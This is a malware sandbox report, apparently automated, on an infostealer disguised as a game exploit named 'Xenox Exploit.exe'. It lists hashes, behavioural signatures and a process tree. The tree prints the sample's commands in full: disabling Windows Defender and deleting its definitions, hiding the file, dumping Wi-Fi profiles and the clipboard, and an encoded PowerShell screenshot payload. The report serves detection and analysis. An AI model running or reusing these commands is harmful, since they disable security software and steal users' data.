Analysis
-
max time kernel
2s -
max time network
33s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241211-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
23-12-2024 17:32
Behavioral task
behavioral1
Sample
Xenox Exploit.exe
Resource
win10ltsc2021-20241211-en
General
-
Target
Xenox Exploit.exe
-
Size
7.5MB
-
MD5
095cfc6cc2bfb81d87d26607d65768d1
-
SHA1
4af4706852b9afcae603db5e7e9fa63953e3ae62
-
SHA256
3e9c3921efb283bcbf868d46fba477b990ebb2ee2eb629d258d3e179ea333b36
-
SHA512
85bcea3dfb806353d2bf0bfd5c08adb3c654fba03464bcf8bb0af29ca8868b792e401224d22851dc5059d0d56a7e1b288e60d522ddc8fdae8caa219478a97a7c
-
SSDEEP
196608:58QCwVxurErvI9pWjgN3ZdahF0pbH1AY7WtQsNo/03vC1Z:rVxurEUWjqeWx06rYYZ
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
pid Process 1756 MpCmdRun.exe -
pid Process 1064 powershell.exe 5008 powershell.exe 3068 powershell.exe 2040 powershell.exe 4980 powershell.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 4748 powershell.exe 3424 cmd.exe -
Loads dropped DLL 17 IoCs
pid Process 252 Xenox Exploit.exe 252 Xenox Exploit.exe 252 Xenox Exploit.exe 252 Xenox Exploit.exe 252 Xenox Exploit.exe 252 Xenox Exploit.exe 252 Xenox Exploit.exe 252 Xenox Exploit.exe 252 Xenox Exploit.exe 252 Xenox Exploit.exe 252 Xenox Exploit.exe 252 Xenox Exploit.exe 252 Xenox Exploit.exe 252 Xenox Exploit.exe 252 Xenox Exploit.exe 252 Xenox Exploit.exe 252 Xenox Exploit.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 23 discord.com 24 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 14 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
pid Process 3152 tasklist.exe 3724 tasklist.exe 1592 tasklist.exe 712 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
pid Process 4548 cmd.exe -
resource yara_rule behavioral1/files/0x0029000000046214-21.dat upx behavioral1/memory/252-25-0x00007FFCB0E20000-0x00007FFCB14E4000-memory.dmp upx behavioral1/files/0x002600000004620e-48.dat upx behavioral1/files/0x002600000004620d-47.dat upx behavioral1/files/0x002600000004620c-46.dat upx behavioral1/files/0x002600000004620b-45.dat upx behavioral1/files/0x00260000000461ff-44.dat upx behavioral1/files/0x00260000000461fb-43.dat upx behavioral1/files/0x00280000000461f5-42.dat upx behavioral1/files/0x002c0000000461f3-55.dat upx behavioral1/memory/252-58-0x00007FFCC0960000-0x00007FFCC0984000-memory.dmp upx behavioral1/memory/252-60-0x00007FFCBFDC0000-0x00007FFCBFF3F000-memory.dmp upx behavioral1/memory/252-64-0x00007FFCC8E50000-0x00007FFCC8E5D000-memory.dmp upx behavioral1/files/0x0029000000046213-67.dat upx behavioral1/memory/252-71-0x00007FFCC0060000-0x00007FFCC012D000-memory.dmp upx behavioral1/memory/252-74-0x00007FFCC07E0000-0x00007FFCC0805000-memory.dmp upx behavioral1/memory/252-73-0x00007FFCB08F0000-0x00007FFCB0E19000-memory.dmp upx behavioral1/files/0x0028000000046221-81.dat upx behavioral1/memory/252-82-0x00007FFCBFCA0000-0x00007FFCBFDBB000-memory.dmp upx behavioral1/memory/252-108-0x00007FFCC0960000-0x00007FFCC0984000-memory.dmp upx behavioral1/memory/252-300-0x00007FFCC2380000-0x00007FFCC2399000-memory.dmp upx behavioral1/memory/252-325-0x00007FFCC0920000-0x00007FFCC0953000-memory.dmp upx behavioral1/memory/252-349-0x00007FFCC0060000-0x00007FFCC012D000-memory.dmp upx behavioral1/memory/252-352-0x00007FFCB08F0000-0x00007FFCB0E19000-memory.dmp upx behavioral1/memory/252-216-0x00007FFCBFDC0000-0x00007FFCBFF3F000-memory.dmp upx behavioral1/memory/252-367-0x00007FFCBFCA0000-0x00007FFCBFDBB000-memory.dmp upx behavioral1/memory/252-359-0x00007FFCBFDC0000-0x00007FFCBFF3F000-memory.dmp upx behavioral1/memory/252-354-0x00007FFCC07E0000-0x00007FFCC0805000-memory.dmp upx behavioral1/memory/252-353-0x00007FFCB0E20000-0x00007FFCB14E4000-memory.dmp upx behavioral1/memory/252-80-0x00007FFCC2630000-0x00007FFCC263D000-memory.dmp upx behavioral1/memory/252-79-0x00007FFCC0990000-0x00007FFCC09BD000-memory.dmp upx behavioral1/memory/252-77-0x00007FFCC0820000-0x00007FFCC0834000-memory.dmp upx behavioral1/memory/252-76-0x00007FFCC9D90000-0x00007FFCC9D9F000-memory.dmp upx behavioral1/memory/252-70-0x00007FFCB0E20000-0x00007FFCB14E4000-memory.dmp upx behavioral1/files/0x0029000000046211-69.dat upx behavioral1/memory/252-66-0x00007FFCC0920000-0x00007FFCC0953000-memory.dmp upx behavioral1/files/0x002800000004621f-63.dat upx behavioral1/memory/252-62-0x00007FFCC2380000-0x00007FFCC2399000-memory.dmp upx behavioral1/files/0x0028000000046220-59.dat upx behavioral1/memory/252-56-0x00007FFCC24D0000-0x00007FFCC24EA000-memory.dmp upx behavioral1/memory/252-54-0x00007FFCC0990000-0x00007FFCC09BD000-memory.dmp upx behavioral1/memory/252-32-0x00007FFCC9D90000-0x00007FFCC9D9F000-memory.dmp upx behavioral1/files/0x0029000000046212-31.dat upx behavioral1/memory/252-30-0x00007FFCC07E0000-0x00007FFCC0805000-memory.dmp upx behavioral1/files/0x00340000000461f4-28.dat upx behavioral1/memory/252-368-0x00007FFCB0E20000-0x00007FFCB14E4000-memory.dmp upx behavioral1/memory/252-393-0x00007FFCC0060000-0x00007FFCC012D000-memory.dmp upx behavioral1/memory/252-392-0x00007FFCC0920000-0x00007FFCC0953000-memory.dmp upx behavioral1/memory/252-391-0x00007FFCC8E50000-0x00007FFCC8E5D000-memory.dmp upx behavioral1/memory/252-390-0x00007FFCC2380000-0x00007FFCC2399000-memory.dmp upx behavioral1/memory/252-389-0x00007FFCBFDC0000-0x00007FFCBFF3F000-memory.dmp upx behavioral1/memory/252-388-0x00007FFCC0960000-0x00007FFCC0984000-memory.dmp upx behavioral1/memory/252-387-0x00007FFCC24D0000-0x00007FFCC24EA000-memory.dmp upx behavioral1/memory/252-386-0x00007FFCC0990000-0x00007FFCC09BD000-memory.dmp upx behavioral1/memory/252-385-0x00007FFCC9D90000-0x00007FFCC9D9F000-memory.dmp upx behavioral1/memory/252-384-0x00007FFCC07E0000-0x00007FFCC0805000-memory.dmp upx behavioral1/memory/252-383-0x00007FFCB08F0000-0x00007FFCB0E19000-memory.dmp upx behavioral1/memory/252-382-0x00007FFCBFCA0000-0x00007FFCBFDBB000-memory.dmp upx behavioral1/memory/252-381-0x00007FFCC2630000-0x00007FFCC263D000-memory.dmp upx behavioral1/memory/252-380-0x00007FFCC0820000-0x00007FFCC0834000-memory.dmp upx -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4572 PING.EXE 2352 cmd.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 4960 cmd.exe 3392 netsh.exe -
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 3372 WMIC.exe 2812 WMIC.exe 3620 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 4028 systeminfo.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4572 PING.EXE -
Suspicious behavior: EnumeratesProcesses 20 IoCs
pid Process 1064 powershell.exe 2040 powershell.exe 1496 WMIC.exe 1496 WMIC.exe 1496 WMIC.exe 1496 WMIC.exe 1064 powershell.exe 1064 powershell.exe 2040 powershell.exe 2040 powershell.exe 3372 WMIC.exe 3372 WMIC.exe 3372 WMIC.exe 3372 WMIC.exe 2812 WMIC.exe 2812 WMIC.exe 2812 WMIC.exe 2812 WMIC.exe 4980 powershell.exe 4980 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1592 tasklist.exe Token: SeDebugPrivilege 1064 powershell.exe Token: SeDebugPrivilege 2040 powershell.exe Token: SeIncreaseQuotaPrivilege 1496 WMIC.exe Token: SeSecurityPrivilege 1496 WMIC.exe Token: SeTakeOwnershipPrivilege 1496 WMIC.exe Token: SeLoadDriverPrivilege 1496 WMIC.exe Token: SeSystemProfilePrivilege 1496 WMIC.exe Token: SeSystemtimePrivilege 1496 WMIC.exe Token: SeProfSingleProcessPrivilege 1496 WMIC.exe Token: SeIncBasePriorityPrivilege 1496 WMIC.exe Token: SeCreatePagefilePrivilege 1496 WMIC.exe Token: SeBackupPrivilege 1496 WMIC.exe Token: SeRestorePrivilege 1496 WMIC.exe Token: SeShutdownPrivilege 1496 WMIC.exe Token: SeDebugPrivilege 1496 WMIC.exe Token: SeSystemEnvironmentPrivilege 1496 WMIC.exe Token: SeRemoteShutdownPrivilege 1496 WMIC.exe Token: SeUndockPrivilege 1496 WMIC.exe Token: SeManageVolumePrivilege 1496 WMIC.exe Token: 33 1496 WMIC.exe Token: 34 1496 WMIC.exe Token: 35 1496 WMIC.exe Token: 36 1496 WMIC.exe Token: SeIncreaseQuotaPrivilege 1496 WMIC.exe Token: SeSecurityPrivilege 1496 WMIC.exe Token: SeTakeOwnershipPrivilege 1496 WMIC.exe Token: SeLoadDriverPrivilege 1496 WMIC.exe Token: SeSystemProfilePrivilege 1496 WMIC.exe Token: SeSystemtimePrivilege 1496 WMIC.exe Token: SeProfSingleProcessPrivilege 1496 WMIC.exe Token: SeIncBasePriorityPrivilege 1496 WMIC.exe Token: SeCreatePagefilePrivilege 1496 WMIC.exe Token: SeBackupPrivilege 1496 WMIC.exe Token: SeRestorePrivilege 1496 WMIC.exe Token: SeShutdownPrivilege 1496 WMIC.exe Token: SeDebugPrivilege 1496 WMIC.exe Token: SeSystemEnvironmentPrivilege 1496 WMIC.exe Token: SeRemoteShutdownPrivilege 1496 WMIC.exe Token: SeUndockPrivilege 1496 WMIC.exe Token: SeManageVolumePrivilege 1496 WMIC.exe Token: 33 1496 WMIC.exe Token: 34 1496 WMIC.exe Token: 35 1496 WMIC.exe Token: 36 1496 WMIC.exe Token: SeIncreaseQuotaPrivilege 2040 powershell.exe Token: SeSecurityPrivilege 2040 powershell.exe Token: SeTakeOwnershipPrivilege 2040 powershell.exe Token: SeLoadDriverPrivilege 2040 powershell.exe Token: SeSystemProfilePrivilege 2040 powershell.exe Token: SeSystemtimePrivilege 2040 powershell.exe Token: SeProfSingleProcessPrivilege 2040 powershell.exe Token: SeIncBasePriorityPrivilege 2040 powershell.exe Token: SeCreatePagefilePrivilege 2040 powershell.exe Token: SeBackupPrivilege 2040 powershell.exe Token: SeRestorePrivilege 2040 powershell.exe Token: SeShutdownPrivilege 2040 powershell.exe Token: SeDebugPrivilege 2040 powershell.exe Token: SeSystemEnvironmentPrivilege 2040 powershell.exe Token: SeRemoteShutdownPrivilege 2040 powershell.exe Token: SeUndockPrivilege 2040 powershell.exe Token: SeManageVolumePrivilege 2040 powershell.exe Token: 33 2040 powershell.exe Token: 34 2040 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2056 wrote to memory of 252 2056 Xenox Exploit.exe 82 PID 2056 wrote to memory of 252 2056 Xenox Exploit.exe 82 PID 252 wrote to memory of 1084 252 Xenox Exploit.exe 83 PID 252 wrote to memory of 1084 252 Xenox Exploit.exe 83 PID 252 wrote to memory of 1436 252 Xenox Exploit.exe 84 PID 252 wrote to memory of 1436 252 Xenox Exploit.exe 84 PID 252 wrote to memory of 4764 252 Xenox Exploit.exe 85 PID 252 wrote to memory of 4764 252 Xenox Exploit.exe 85 PID 252 wrote to memory of 3240 252 Xenox Exploit.exe 89 PID 252 wrote to memory of 3240 252 Xenox Exploit.exe 89 PID 252 wrote to memory of 3424 252 Xenox Exploit.exe 126 PID 252 wrote to memory of 3424 252 Xenox Exploit.exe 126 PID 1084 wrote to memory of 2040 1084 cmd.exe 93 PID 1084 wrote to memory of 2040 1084 cmd.exe 93 PID 1436 wrote to memory of 1064 1436 cmd.exe 94 PID 1436 wrote to memory of 1064 1436 cmd.exe 94 PID 3240 wrote to memory of 1592 3240 cmd.exe 138 PID 3240 wrote to memory of 1592 3240 cmd.exe 138 PID 4764 wrote to memory of 3592 4764 cmd.exe 96 PID 4764 wrote to memory of 3592 4764 cmd.exe 96 PID 3424 wrote to memory of 1496 3424 cmd.exe 97 PID 3424 wrote to memory of 1496 3424 cmd.exe 97 PID 252 wrote to memory of 1704 252 Xenox Exploit.exe 100 PID 252 wrote to memory of 1704 252 Xenox Exploit.exe 100 PID 1704 wrote to memory of 1312 1704 cmd.exe 102 PID 1704 wrote to memory of 1312 1704 cmd.exe 102 PID 252 wrote to memory of 3020 252 Xenox Exploit.exe 103 PID 252 wrote to memory of 3020 252 Xenox Exploit.exe 103 PID 3020 wrote to memory of 1176 3020 cmd.exe 105 PID 3020 wrote to memory of 1176 3020 cmd.exe 105 PID 252 wrote to memory of 3940 252 Xenox Exploit.exe 106 PID 252 wrote to memory of 3940 252 Xenox Exploit.exe 106 PID 3940 wrote to memory of 3372 3940 cmd.exe 108 PID 3940 wrote to memory of 3372 3940 cmd.exe 108 PID 1436 wrote to memory of 1756 1436 cmd.exe 109 PID 1436 wrote to memory of 1756 1436 cmd.exe 109 PID 252 wrote to memory of 4004 252 Xenox Exploit.exe 110 PID 252 wrote to memory of 4004 252 Xenox Exploit.exe 110 PID 4004 wrote to memory of 2812 4004 cmd.exe 112 PID 4004 wrote to memory of 2812 4004 cmd.exe 112 PID 252 wrote to memory of 4548 252 Xenox Exploit.exe 113 PID 252 wrote to memory of 4548 252 Xenox Exploit.exe 113 PID 252 wrote to memory of 2976 252 Xenox Exploit.exe 114 PID 252 wrote to memory of 2976 252 Xenox Exploit.exe 114 PID 4548 wrote to memory of 3028 4548 cmd.exe 117 PID 4548 wrote to memory of 3028 4548 cmd.exe 117 PID 2976 wrote to memory of 4980 2976 cmd.exe 118 PID 2976 wrote to memory of 4980 2976 cmd.exe 118 PID 252 wrote to memory of 4848 252 Xenox Exploit.exe 119 PID 252 wrote to memory of 4848 252 Xenox Exploit.exe 119 PID 252 wrote to memory of 5000 252 Xenox Exploit.exe 120 PID 252 wrote to memory of 5000 252 Xenox Exploit.exe 120 PID 4848 wrote to memory of 3724 4848 cmd.exe 123 PID 4848 wrote to memory of 3724 4848 cmd.exe 123 PID 5000 wrote to memory of 712 5000 cmd.exe 124 PID 5000 wrote to memory of 712 5000 cmd.exe 124 PID 252 wrote to memory of 760 252 Xenox Exploit.exe 125 PID 252 wrote to memory of 760 252 Xenox Exploit.exe 125 PID 252 wrote to memory of 3424 252 Xenox Exploit.exe 126 PID 252 wrote to memory of 3424 252 Xenox Exploit.exe 126 PID 252 wrote to memory of 4704 252 Xenox Exploit.exe 129 PID 252 wrote to memory of 4704 252 Xenox Exploit.exe 129 PID 252 wrote to memory of 3308 252 Xenox Exploit.exe 130 PID 252 wrote to memory of 3308 252 Xenox Exploit.exe 130 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 3028 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Xenox Exploit.exe"C:\Users\Admin\AppData\Local\Temp\Xenox Exploit.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2056 -
C:\Users\Admin\AppData\Local\Temp\Xenox Exploit.exe"C:\Users\Admin\AppData\Local\Temp\Xenox Exploit.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:252 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Xenox Exploit.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:1084 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Xenox Exploit.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2040
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:1436 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1064
-
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All4⤵
- Deletes Windows Defender Definitions
PID:1756
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Debes tener bloxtrap instalado para usar este exploit', 0, 'Aviso', 48+16);close()""3⤵
- Suspicious use of WriteProcessMemory
PID:4764 -
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Debes tener bloxtrap instalado para usar este exploit', 0, 'Aviso', 48+16);close()"4⤵PID:3592
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3240 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1592
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:3424 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1496
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:1704 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:1312
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:3020 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:1176
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:3940 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious behavior: EnumeratesProcesses
PID:3372
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:4004 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious behavior: EnumeratesProcesses
PID:2812
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Xenox Exploit.exe""3⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:4548 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Temp\Xenox Exploit.exe"4⤵
- Views/modifies file attributes
PID:3028
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:2976 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4980
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4848 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3724
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:5000 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:712
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵PID:760
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:5100
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:3424 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:4748
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:4704
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3152
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:3308
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:4860
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4960 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3392
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:1896
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:1592
-
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:4028
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwA